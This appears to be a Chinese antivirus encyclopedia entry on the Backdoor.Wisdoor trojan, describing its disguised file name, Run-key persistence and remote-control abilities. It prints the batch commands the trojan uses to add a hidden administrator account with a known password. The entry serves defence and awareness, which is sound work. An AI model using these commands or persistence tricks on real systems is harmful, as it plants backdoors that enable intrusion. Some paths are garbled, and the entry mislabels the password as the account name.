§ 概述

病毒别名：Backdoor.Wisdoor.x 【AVP】,BackDoor-AOZ 【McAFee】,Backdoor/Wisdoor.o 【KV】

处理时间：

威胁级别：★

中文名称：金拱门变种X

病毒类型：黑客程序

影响系统：Win9x/WinMe/WinNT/Win2000/WinXP/Win2003

病毒行为:

编写工具:32位汇编语言

传染条件:

发作条件:用户误运行该程序

§ 系统修改:

1.复制病毒到系统目录下%System%RUNDLLEXE,该病毒的名字与系统文件rundll.exe和rundll32.exe很相似,

如果不仔细看,用户一般比较难发现

2.在注册表中子键:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

添加启动项:"Windows DLL Loader"="%System%RUNDLLEXE",以便每次系统启动的时候该病毒也随之启动

3.在系统目录下建立临时批处理文件temp.bat,其内容如下:

@echo off

net user /add System letmein

net localgroup /add Administrators System

del %0

其目的是在染毒系统中添加管理员帐户letmein,为以后入侵该机器作好准备

发作现象:

§ 特别说明:

如果黑客成功的控制了染毒机器,那么危害是比较大的:

A.从染毒机器下载文件

B.向染毒机器上传文件,当然病毒木马也在上传文件之列

C.修改或删除用户的数据

D.在染毒机器上执行某些程序(木马黑客程序应该是最有可能的了,嘿嘿!)

E.终止某些进程(例如:瑞星实时监控程序,天网防火墙等)

F.通过染毒机器向第3台机器发起攻击

• 巨峰
• 巨峰游览区
• 巨峰站
• 巨川
• 巨州龙游“桂花白糖猪油汽糕”
• 巨帙
• 巨幅
• 巨幕电影
• 巨幼红细胞
• 巨幼细胞贫血
• 巨影乾龙
• 巨德
• 巨慝
• 巨扁肯氏兽
• 巨手
• 巨掌
• 巨文岛
• 巨斧君
• 巨斧将
• 巨斧尊
• 巨斧王
• 巨斧螳螂
• 巨族
• 巨星
• 巨星总动员